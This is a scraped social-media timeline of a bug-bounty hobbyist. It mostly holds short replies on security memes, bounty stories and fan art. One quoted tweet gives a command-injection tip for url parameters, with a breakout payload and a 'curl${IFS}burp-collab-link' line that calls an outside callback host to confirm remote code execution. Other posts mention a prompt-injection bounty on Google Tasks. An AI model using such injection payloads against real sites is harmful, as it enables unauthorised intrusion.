foo

107 posts

foo

@foo125973

Katılım Ağustos 2025

65 Takip Edilen3 Takipçiler

foo@foo125973·19h

@jingqiu04 生日快乐！

中文

京秋🍥@jingqiu04·1d

陌生人可以祝我生日快乐吗

中文

4.5K

382

19.3K

434.4K

foo@foo125973·1d

@darkshadow2bd But logically why would developer add RCE as a service here?

English

1.3K

DarkShadow@darkshadow2bd·1d

?url= ❌SSRF, ✅RCE if you find a parameter which passing url then, before testing SSRF try to test RCE. 1. bypass: ?url=http://x"; [now add here your blind rce payload] 2. payload: curl${ IFS }burp-collab-link;# Join my BugBounty telegram channel: t.me/SehllSec

English

531

22.2K

foo@foo125973·4d

@medusa_0xf To support your point, how many bugs did you find with Claude so far? Could you make write-ups for them?

English

128

Medusa@medusa_0xf·4d

This is you if you do bug hunting without Claude right now. 🫵

GIF

English

6.1K

foo@foo125973·4d

@Roquefortsin

QME

2.1K

Reese & Roquefort #Loneros🏴‍☠️☢️@Roquefortsin·4d

Okay here's the gem version

Reese & Roquefort #Loneros🏴‍☠️☢️ tweet media

Reese & Roquefort #Loneros🏴‍☠️☢️@Roquefortsin

Every fandom has at least one of these ships who have the most annoying fans ever

English

275

5.8K

79.4K

2.1M

foo@foo125973·5d

@es3n1n Real

English

es3n1n@es3n1n·6d

i need to find a new obsession now that ctfs are deadge

English

180

10.2K

foo@foo125973·6d

@weezerOSINT It's just Wednesday in cybersecurity man

English

impulsive@weezerOSINT·6d

Github got hacked, the US President is mass leaking PII on trump mobile orders, teens are streaming mass events on Discord and some horror game on Steam is spreading malware. too much going on.

GIF

GitHub@github

1/ We are sharing additional details regarding our investigation into unauthorized access to GitHub's internal repositories. Yesterday we detected and contained a compromise of an employee device involving a poisoned VS Code extension. We removed the malicious extension version, isolated the endpoint, and began incident response immediately.

English

132

10.4K

foo@foo125973·17 May

@saltyAom youtube.com/watch?v=sqK-jh…

YouTube

QME

SaltyAom@saltyAom·16 May

I don't need a robot's robot art Don't need a robot's robot song Don't need a robot's robot word Don't need a robot's love

English

2.9K

foo@foo125973·17 May

@TraceX0_0 @tsxninja200 @defronixacademy @thehacktivator Congratulations :)

English

TraceX0@TraceX0_0·17 May

FIRST BOUNTY UNLOCKED 😭🔥 Started my bug bounty journey with a HIGH severity report… still feels unreal 🫡 Months of NA, duplicates, failures & grinding finally paid off 🙏 God’s plan really different sometimes. @tsxninja200 @defronixacademy @thehacktivator #bugbounty

English

297

10.2K

foo@foo125973·17 May

@galnagli It's running nmap

English

100

Nagli@galnagli·16 May

One critical a day keeps the doctor away

English

240

18.6K

foo@foo125973·16 May

@Sonderr_illust the best thing I've seen today

English

114

Sonderr@Sonderr_illust·15 May

i drew asa mitaka #chainsawman

English

1.2K

11K

89.6K

foo@foo125973·15 May

@LiveOverflow Real

English

1.6K

LiveOverflow 🔴@LiveOverflow·15 May

my brain after one year of vibe coding

English

706

32.1K

foo@foo125973·15 May

@Tur24Tur @Burp_Suite @ChatGPTapp Bug bounty hunters will do anything just to not test the application /jk This is actually good, would like to see it in @Burp_Suite

English

218

Tur.js@Tur24Tur·15 May

Replaced @Burp_Suite splash screen with a custom design. Found the PNG inside the binary using a hex editor, generated new artwork with @ChatGPTapp, patched it in. Guide and prompt: bugbounty.zip/Share/burp-spl… #AIArt #DigitalArt

English

232

18.8K

foo@foo125973·14 May

@0xTib3rius Real

English

Tib3rius@0xTib3rius·14 May

It's not web pentesting, we're all dumb af.

THE|VOICE|OF|THE|STREET®@THESTREETVOICE3

Which field has the smartest Hackers? Malware Dev Reverse Engineering Web Pentesting Exploit Dev

English

271

31.9K

foo@foo125973·8 May

@Behi_Sec Ok. Changing tasks name without confirmation But attacker needs to be in the same space to able to inject his task first, and renaming tasks is annoying but doesn't sound critical. Am I missing something, where's that 15k$ impact?

English

Behi@Behi_Sec·7 May

That's it for the thread. Hope you enjoyed it. Feel free to ask if you have any questions. And follow me for more content like this: @Behi_Sec

English

2.6K

Behi@Behi_Sec·7 May

A few months ago, I found a Prompt Injection vulnerability on Google Tasks. It was simple, yet tricky. Google rewarded me with a $15,000 bounty for it. Here's the full story:

English

590

27.2K